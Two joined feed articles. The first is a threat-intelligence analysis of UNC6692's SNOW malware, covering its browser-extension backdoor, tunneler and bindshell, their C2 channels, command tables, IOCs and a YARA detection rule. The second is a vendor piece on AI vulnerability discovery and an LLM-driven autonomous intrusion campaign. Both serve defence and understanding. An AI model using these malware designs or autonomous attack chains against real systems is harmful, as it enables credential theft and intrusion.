Upon successful submission, the script executes an asynchronous PUT request using AWS URLs. The validated credentials and metadata are uploaded directly to an attacker-controlled Amazon S3 bucket (e.g.,service-page-18968-2419-outlook.s3.us-west-2.amazonaws.com), which have since been taken down. These buckets serve as the command and control (C2) infrastructure and represent critical indicators of compromise (IOCs).
To mask this background activity and prevent user suspicion, the script initiates a startProgressBar function. This displays a scripted distraction sequence featuring fake technical tasks such as "Parsing configuration data" and "Checking mailbox integrity." This manipulation keeps the victim engaged until the data transfer is complete.
Figure 8: A scripted distraction sequence used to mask the background exfiltration of stolen data
Phase 4: Malware Staging and Endpoint Foothold
The final stage involves the delivery of secondary malicious payloads referenced within the CONFIG object of the script. While the progress bar runs, the site is prepared to deliver files seen in Table 1.
Button Clicked
File Downloaded
Type / Risk
Profile 1.3
Protected.ahk
AutoHotKey Script:Not found during the investigation, but suspected to install SNOWBELT.
Profile B5
profileB5.txt
Likely a configuration file for the malware.
Component Verification
RegSrvc.exe
AutoHotKey Executable:Masquerading as a "Registration Service."
Health Check
N/A
Prompts the user to input email credentials. Exfiltrates the credentials to Amazon S3 bucket.
Table 1: Buttons on the landing page
By the time the user receives a "Configuration completed successfully" message, the attacker has secured the credentials and potentially established a persistent foothold on the endpoint using these staged files.
The SNOW malware ecosystem, attributed to the threat cluster UNC6692, operates as a modular ecosystem comprising three primary components: SNOWBELT, SNOWGLAZE, and SNOWBASIN. Rather than functioning as isolated tools, these components form a coordinated pipeline that facilitates an attacker's journey from initial browser-based access to the internal network of the organization.
Figure 9: The SNOW ecosystem
1.SNOWBELT (Browser Extension)
SNOWBELTserves as the initial foothold and the primary "eyes" of the operation. It is a JavaScript-based backdoor delivered as a Chromium browser extension, often masquerading under names like "MS Heartbeat" or "System Heartbeat". Rather than being available through the Chrome Web Store, the extension is deployed through social engineering tactics.
Role:It is designed to intercept commands and send them to SNOWBASIN for execution . It maintains persistence via the browser's extension registration system and uses Service Worker Alarms and Keep-Alive Tab Injection (via helper.html) to ensure it remains active whenever the browser is running.
Functionality:By relaying commands from the threat actor to SNOWBASIN, SNOWBELT provides authenticated access to the environment. This allows the attacker to move laterally and escalate privileges without the need for constant re-authentication.
2.SNOWGLAZE (Python Tunneler)
Once a foothold is established, SNOWGLAZE is deployed to manage the logistics of external communication. SNOWGLAZE is a Python-based tunneler that can operate in both Windows and Linux environments.
Role:Its primary function is to create a secure, authenticated WebSocket tunnel between the victim's internal network and the attacker's command-and-control (C2) infrastructure, such as a Heroku subdomain. It facilitates SOCKS proxy operations, allowing arbitrary TCP traffic to be routed through the infected host.
Functionality:SNOWGLAZE masks malicious traffic by wrapping data in JSON objects and Base64 encoding it for transfer via WebSockets. This makes the activity appear as standard encrypted web traffic. When attackers wish to interact with backdoors like SNOWBASIN or exfiltrate staged data, traffic is routed through this established tunnel.
3.SNOWBASIN (Python Bindshell)
While SNOWBELT monitors the user and SNOWGLAZE bridges the network gap, SNOWBASIN provides the functional interactive control over the infected system.
Role:It acts as a persistent backdoor that operates as a local HTTP server (typically listening on port 8000). It enables remote command execution via cmd.exe or powershell.exe, screenshot capture, and data staging for exfiltration.
Functionality:This component is where active reconnaissance and mission completion occur. Attacker commands (such as whoami or net user) are sent through the SNOWGLAZE tunnel, intercepted by the SNOWBELT extension, and then proxied to the SNOWBASIN local server via HTTP POST requests. SNOWBASIN executes these commands and relays the results back through the same pipeline to the attacker.
Malware Analysis
SNOWBELT
SNOWBELT is a JavaScript-based backdoor implemented as a Chromium browser extension. Its lifecycle begins with the execution of the background.js Service Worker upon installation, which leverages the browser's extension registration system for persistence. To ensure continuous operation while the browser is active, the malware utilizes Service Worker Alarms (agent-heartbeat) and Keep-Alive Tab Injection (helper.html).
Upon initialization, the malware generates a unique identity using the prefix fp-sw- followed by a UUID. It then employs a time-based DGA to calculate C2 URLs. Using a hard-coded seed value (691f7258f212fa8908a8bf06bcf9e027d2177276e13e10ff56bd434ff3755cc4), it generates a registry URL for an S3 bucket within 30-minute time slots. These URLs follow a specific structural pattern:
This setup provides an asynchronous channel that allows attackers to "wake up" the Service Worker immediately via authenticated Push messages, bypassing standard polling. Additionally, the malware supports real-time interaction through a persistent REGISTRY_WEBSOCKET_URL connection.
SNOWBELT functions in coordination with SNOWBASIN, a backdoor acting as a local web server (typically on port 8000). It relays decrypted C2 commands—such as command, buffer, flush, and commit—to SNOWBASIN via HTTP POST requests, effectively proxying shell commands to the host system.
The malware also includes mechanisms to bypass the browser sandbox:
Native Host Bridge (open_native_messaging):Uses chrome.runtime.connectNative to establish I/O pipes with local applications for issuing privileged commands.
Protocol Handler Abuse (open_uri):Employs dream.html and dream.js to trigger custom URI schemes in new tabs, targeting vulnerabilities in third-party desktop applications.
Exfiltration is managed by the sendJsonDataToS3 function, which encrypts data with AES-GCM (Key: SHA256(SEED + "|ping|" + bucket + "|" + objectKey)) before uploading to S3. The backdoor's command set is summarized in Table 2.
Command Type
Description
command
Relayed: Decrypts and POSTs command text to SNOWBASIN; exfiltrates response to C2.
buffer
Relayed: Forwards file path payloads to local buffer endpoint.
flush
Relayed: Triggers a data flush on the local server.
commit
Relayed: Sends URL and path data for local processing.
stop_server
Relayed: Shutdown signal for the local SNOWBASIN instance.
screenshot
Relayed: Requests a screen capture from the host.
payload
Internal: Downloads files using chrome.downloads; supports URLs and base64 blobs.
open_native_messaging
Internal: Direct connection to native host apps via Chrome APIs.
open_uri
Internal: Triggers external protocol handlers via helper pages.
delete_cache
Internal: Removes downloaded files from the system.
websocket_control
Internal: Controls the state of WebSocket connectivity.
ping
Internal: Provides heartbeats and status updates to the C2.
Table 2: SNOWBELT commands
Finally, SNOWBELT implements a feedback loop by monitoring chrome.downloads.onChanged. If a download is blocked (e.g., FILE_VIRUS_INFECTED), the malware reports the error back to the S3-based C2.
SNOWBASIN
SNOWBASIN is a Python-based backdoor that operates as a local HTTP server on ports 8000, 8001, or 8002. Its core capabilities include command execution, screenshot capture, and data exfiltration. The malware also enables operators to manage files by downloading or deleting them, and it provides the capability to terminate active connections. SNOWBELT relays commands to this malware by sending HTTP requests to localhost:8000.
It turns the victim's computer into a command-and-control (C2) node that can be controlled via HTTP requests. It is designed to run on Windows (evidenced by os.chdir('C:\\') and cmd.exe calls) and allows a remote actor to execute commands, steal files, and take screenshots.
Endpoint
Function
Description
/stream
Remote Shell
Receives a command and executes it via cmd.exe or powershell.exe. It returns the STDOUT/STDERR results to the attacker.
/buffer
File Exfiltration
If a file path is provided, it reads the file, encodes it in Base64, and sends it back. If a folder is provided, it returns a full directory listing
/flush
File Deletion
Relayed. Signals http://localhost[:]8000/flush to flush buffered data.
/commit
File Ingress
Downloads a file from a provided URL and saves it to a specific path on the local disk. It bypasses SSL certificate verification (CERT_NONE).
/capture
Take Screenshots
Uses the mss and PIL libraries to take a screenshot of all monitors and send the image back as a Base64 string.
/gc
Self-Termination
Shuts down the server instance, effectively ""killing"" the backdoor's connection.
Table 3: SNOWBASIN endpoints
SNOWGLAZE
The network tunneler SNOWGLAZE, developed in Python, facilitates the routing of arbitrary TCP traffic through a compromised system by establishing a WebSocket connection to a static C2 host using hard-coded credentials.
The script is designed for cross-platform execution on both Windows and Linux, utilizing environment-specific behaviors for each. In Windows environments, it runs as a foreground process manageable via standard keyboard interrupts (Ctrl-C). Conversely, on Linux, it operates as a background daemon and includes specific logic to handle SIGINT and SIGTERM signals for orderly shutdowns.
To establish communication, the malware targets the C2 server at wss://sad4w7h913-b4a57f9c36eb[.]herokuapp[.]com:443/ws, masquerading its traffic with a Microsoft Edge User-Agent string. If the initial connection fails, the script employs an incremental backoff strategy, starting at 5 seconds and increasing by 5-second intervals up to a 300-second maximum. Upon a successful WebSocket handshake, it transmits the following Auth payload:
Following authentication, the script sends a "register" type message with no payload, followed by an "agent_info" JSON record. Although the "info" field within this record is intended to carry the public IP address, it remains unpopulated due to improper implementation in the script.
Once fully connected, the malware listens for JSON-formatted commands. The supported "type" values include:
ping
Prompts the script to return a "type": "pong" JSON object.
agent_public_ip
Intended to report the host's public IP via an agent_info structure; however, the IP field is consistently blank in current versions.
socks_connect
Requests a new SOCKS proxy connection using a unique conn_id provided by the operator to track the session. The request format is as follows:
Execution triggers an asynchronous worker thread that manages the TCP-to-WebSocket data transfer, utilizing Base64 encoding and JSON encapsulation with the socks_data type.
socks_data
Facilitates bidirectional data exchange between the WebSocket and the TCP socket. Data is Base64-encoded within the data field of the following structure:
Terminates the specific proxy stream identified by the given conn_id.
disconnect
Serves all active proxy connections and terminates script execution.
Outlook & Implications
The UNC6692 campaign demonstrates how modern attackers blend social engineering and technical evasion to gain a foothold into environments. A critical element of this strategy is the systematic abuse of legitimate cloud services for payload delivery and exfiltration, and for command-and-control (C2) infrastructure. By hosting malicious components on trusted cloud platforms, attackers can often bypass traditional network reputation filters and blend into the high volume of legitimate cloud traffic.
This "living off the cloud" strategy allows attackers to blend malicious operations into a high volume of encrypted, reputably sourced traffic, making detection based on domain reputation or IP blocking increasingly ineffective. Defenders must now look beyond process monitoring to gain clear visibility into browser activity and unauthorized cloud traffic. As threat actors continue to professionalize these modular, cross-platform methodologies, the ability to correlate disparate events across the browser, local Python environments, and cloud egress points will be critical for early detection.
Indicators of Compromise (IOCs)
To assist the wider community in hunting and identifying the activity outlined in this blog post, we have included IOCs in a free GTI Collection for registered users.
rule G_Backdoor_SNOWBASIN_1 {
meta:
author = "Google Threat Intelligence Group (GTIG)"
platform = "Windows"
strings:
$path1 = "self.path == '/probe':"
$path2 = "self.path == '/stream':"
$path3 = "self.path == '/buffer':"
$path4 = "self.path == '/flush':"
$path5 = "self.path == '/commit':"
$path6 = "self.path == '/capture':"
$path7 = "self.path == '/gc':"
$func1 = "self.handle_stream("
$func2 = "self.handle_buffer("
$func3 = "self.handle_flush("
$func4 = "self.handle_commit("
$s1 = "self.wfile.write(info_msg"
$s2 = "selected_port), WebServerHandler) as httpd:"
$s3 = "ThreadedTCPServer(socketserver.ThreadingMixIn"
$s4 = "httpd.serve_forever()"
condition:
filesize<1MB and (
(all of ($s*) and 6 of ($path*, $func*)) or
(8 of ($path*, $func*)) or
10 of them
)
}
MITRE ATT&CK
Tactic
Techniques
Initial Access
T1566.002: Spearphishing Link
Execution
T1053: Scheduled Task/Job
T1053.005: Scheduled Task
T1059: Command and Scripting Interpreter
T1059.001: PowerShell
T1059.003: Windows Command Shell
T1059.006: Python
T1059.007: JavaScript
T1059.010: AutoHotKey & AutoIT
T1204.001: Malicious Link
T1204.002: Malicious File
T1559: Inter-Process Communication
T1569.002: Service Execution
Persistence
T1176.001: Browser Extensions
T1543: Create or Modify System Process
T1543.003: Windows Service
T1547.001: Registry Run Keys / Startup Folder
T1547.009: Shortcut Modification
Privilege Escalation
T1068: Exploitation for Privilege Escalation
Defense Evasion
T1027: Obfuscated Files or Information
T1027.010: Command Obfuscation
T1027.015: Compression
T1036.005: Match Legitimate Resource Name or Location
T1055: Process Injection
T1070.004: File Deletion
T1112: Modify Registry
T1134: Access Token Manipulation
T1134.001: Token Impersonation/Theft
T1140: Deobfuscate/Decode Files or Information
T1202: Indirect Command Execution
T1562.001: Disable or Modify Tools
T1564.001: Hidden Files and Directories
T1622: Debugger Evasion
Credential Access
T1003.001: LSASS Memory
T1003.002: Security Account Manager
T1003.003: NTDS
T1110.001: Password Guessing
T1110.003: Password Spraying
T1552.001: Credentials In Files
Discovery
T1007: System Service Discovery
T1012: Query Registry
T1016: System Network Configuration Discovery
T1018: Remote System Discovery
T1033: System Owner/User Discovery
T1046: Network Service Discovery
T1057: Process Discovery
T1082: System Information Discovery
T1083: File and Directory Discovery
T1087.001: Local Account
T1518: Software Discovery
Lateral Movement
T1021.001: Remote Desktop Protocol
T1021.002: SMB/Windows Admin Shares
Collection
T1005: Data from Local System
T1074: Data Staged
T1113: Screen Capture
T1560: Archive Collected Data
T1560.001: Archive via Utility
Exfiltration
T1020: Automated Exfiltration
T1567: Exfiltration Over Web Service
T1567.002: Exfiltration to Cloud Storage
Command and Control
T1071.001: Web Protocols
T1090: Proxy
T1105: Ingress Tool Transfer
T1572: Protocol Tunneling
Impact
T1489: Service Stop
Resource Development
T1608.002: Upload Tool
T1608.005: Link Target
Acknowledgements
This analysis would not have been possible without the assistance from several individuals within Mandiant Consulting, Google Threat Intelligence Group and FLARE who helped with analysis and reviewing this blog post. We also appreciate Amazon for their collaboration against this threat.
from Threat Intelligence https://ift.tt/FtY8qly
via IFTTT
Last week, Anthropic announced Project Glasswing, an AI model so effective at discovering software vulnerabilities that they took the extraordinary step of postponing its public release. Instead, the company has given access to Apple, Microsoft, Google, Amazon, and a coalition of others to find and patch bugs before adversaries can.
Mythos Preview, the model that led to Project Glasswing, found vulnerabilities across every major operating system and browser. Some of these bugs had survived decades of human audits, aggressive fuzzing, and open-source scrutiny. One had been sitting for 27 years in OpenBSD, generally considered to be one of the world’s most secure operating systems.
It's tempting to file this under "AI lab says their AI is too dangerous," the same playbook OpenAI ran with GPT-2.
Not so fast; there's a material difference this time.
Mythos didn't just find individual CVEs.
It chained four independent bugs into an exploit sequence that bypassed both the browser renderer and the OS sandboxing
It performed local privilege escalation in Linux through race conditions
It built a 20-gadget ROP chain targeting FreeBSD's NFS server, distributed across packets.
Claude Opus 4.6, Anthropic's previous frontier model, failed at autonomous exploit development almost entirely.Mythos hit a 72.4% success rate in the Firefox JS shell.
This isn't theoretical, nor some new three-to-five-year prediction. This is about to be a real-world engineering reality.
Why Project Glasswing Exposes the Real Cybersecurity Gap
Here's the number that should keep security leaders awake at night: fewer than 1% of the vulnerabilities found by Mythos were patched.
Let that sink in for a moment.
The most powerful vulnerability discovery engine ever built ran against the world's most critical software, and the ecosystem couldn't absorb the output.
Glasswing solved the finding problem.
Nobody solved the problem of fixing.
Why Defenders Can't Keep Up: Calendar Speed vs. Machine Speed
This is the structural issue the cybersecurity industry has been circling for years. AI just made it impossible to ignore.
Defenders operate on calendar speed. They:
Gather intelligence
Build a campaign
Simulate the threats
Mitigate
Repeat
That cycle takes about four days on a good day. Attackers, especially those now leveraging LLMs at every stage of their operation, are moving at machine speed.
For an up-to-the-minute take, David B. Cross, CISO at Atlassian, will be speaking at the Autonomous Validation Summit on May 12 about what this looks like from the inside, why periodic testing can't keep pace with adversaries that operate autonomously, and what defenders should be doing instead.
AI-Powered Attacks Are Already Autonomous
Earlier this year, a threat actor deployed a custom MCP server hosting an LLM as part of their attack chain against FortiGate appliances.
The AI handled everything:
Automated backdoor creation
Internal infrastructure mapping fed directly to the model
Autonomous vulnerability assessment, and
AI-prioritized execution of offensive tools for domain admin access.
The result? 2,516 organizations across 106 countries were compromised in parallel. The entire chain, from initial access through credential dumping to data exfiltration, was autonomous. The only human involvement was reviewing the results afterward.
The gap between attacker speed and defender speed isn't new.
What's new is that a small but worrisome gap just became a canyon.
Autonomous systems like AISLE discovered 13 out of 14 OpenSSL CVEs in recent coordinated releases, bugs that had survived years of human review.
XBOW became the top-ranked hacker on HackerOne in 2025, surpassing all human participants.
The median time from disclosure to weaponized exploit dropped from 771 days in 2018 to single-digit hours by 2024.
By 2025, the majority of exploits will be weaponized before being publicly disclosed.
Now add Mythos-class discovery to this picture.
You don't get a safer world automatically. You get a tsunami of legitimate findings that still require human verification, organizational process, business continuity considerations, and patch cycles that haven't fundamentally changed in a decade.
How to Build a Mythos-Ready Security Program
The instinct after Glasswing is to ask: "How do we find more bugs?"
That's actually the wrong question.
The right one is: "When thousands of exploitable vulnerabilities land on your desk tomorrow morning, can your program actually process them?"
For most organizations, the honest answer is no. And the reason isn't a lack of tools or talent; it's a structural dependency on periodic, human-initiated processes that were designed for a world where vulnerabilities trickled in, not one where they arrived in a tsunami.
We can't fix every vulnerability. We can't apply every hardening option.
That's not defeatism, that’s the pragmatic starting point for any security program that actually works. The question that matters isn't "is this CVE critical?" but "is this vulnerability exploitable in my environment, right now, given what I have deployed?"
First: Signal-Driven Validation Over Scheduled Testing
When a new threat emerges, when an asset changes, or when a configuration drifts, defenses need to be tested against that specific change in that moment. Not during the next quarterly pentest. Not when someone can find an open calendar slot.
The entire concept of "scheduled validation" assumes a stable threat landscape, and today, that assumption is dead on arrival.
Second: Environment-Specific Context Over Generic CVSS Scores
Glasswing will produce an avalanche of CVEs.
Yet most vulnerability management programs are still prioritized by CVSS scores. This context-free metric tells you how bad a bug could be in theory, not whether it's exploitable in your specific infrastructure, given your controls and business risk.
When the volume of findings suddenly goes from hundreds to thousands, context-free prioritization won't just slow you down; it’ll break your process entirely.
The current model can’t survive in a world where adversaries exploit CVEs within hours of disclosure. You know the drill:
Scanner finds a bug
Analyst triages it
The ticket goes to a different team
Someone patches it weeks later
Nobody re-validates
That chain of manual handoffs is exactly where the system disintegrates. If the cycle from finding to fix to re-validation can't run without humans shuttling tickets between queues, it clearly isn’t running anywhere near machine speed.
This isn't about buying more tools. It's about defenders leveraging their one asymmetric advantage: you know your organization’s topology, attackers don't.
That's a significant advantage, but only if you can act on it at machine speed.
How Autonomous Exposure Validation Closes the Gap — and Where Picus Comes in
This is the part where I’m going to be really transparent about who's writing this.
At Picus Security, we build a platform for Autonomous Exposure Validation. So, full disclosure, I have a perspective here that comes with an inherent bias. Take it accordingly.
What Glasswing crystallized for us, and for a lot of the CISOs we've been speaking with, is that the validation step within any exposure management program just became the most critical bottleneck.
Finding vulnerabilities is about to get radically easier and more efficient
Patching them is going to remain painfully slow.
The only lever you can pull in between is knowing which ones actually matter to your environment. That's validation.
From Four Days to Three Minutes: How Agentic Workflows Change the Cycle
We built Picus Swarm, the AI team powering autonomous, real-time validation, to compress the traditional four-day cycle into minutes.
It's a set of AI agents that work together to do what used to require handoffs between four separate teams:
A researcher agent ingests and vets threat intelligence.
A red teamer agent maps it against your environment to generate a safety-checked attacker playbook.
A simulator agent executes across your actual endpoints and cloud, gathering telemetry and proof data.
A coordinator agent bridges findings to remediation, opening tickets, triggering SOAR playbooks, pushing indicators of attack to your EDR, and re-validating after fixes land.
Every action is traceable and auditable, andevery agent operates within guardrails you define.
The whole chain, from a new CISA alert to validated, remediation-ready findings, runs in about three minutes.
When a Mythos-class model drops thousands of findings on your organization, you need something that can immediately tell you which of these are exploitable in your environment. Which controls would hold, which would fail, and what's the vendor-specific fix?
The Uncomfortable Truth
Project Glasswing is going to be measured by one metric: how many vulnerabilities get patched before they get exploited. Not how many are found, not how impressive the exploit chains are, but whether the ecosystem can digest what AI is about to produce.
Visibility alone has never been enough, 83% of cybersecurity programs still show no measurable results. What’s changing the equation is closing the gap between seeing and proving: knowing whether a potential vulnerability would actually compromise your environment.
That's validation.
And in a post-Glasswing world, it's the only thing standing between a flood of discoveries and a flood of breaches.
We're hosting the Autonomous Validation Summit on May 12 & 14 with Frost & Sullivan, featuring practitioners from Kraft Heinz and Glow Financial Services, along with our CTO, Volkan Erturk. Together, we’ll be taking a deeper dive into this specific problem.
Note: This article was written by Sıla Özeren Hacıoğlu, Security Research Engineer at Picus Security.
Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.
from The Hacker News https://ift.tt/zt1dSha
via IFTTT
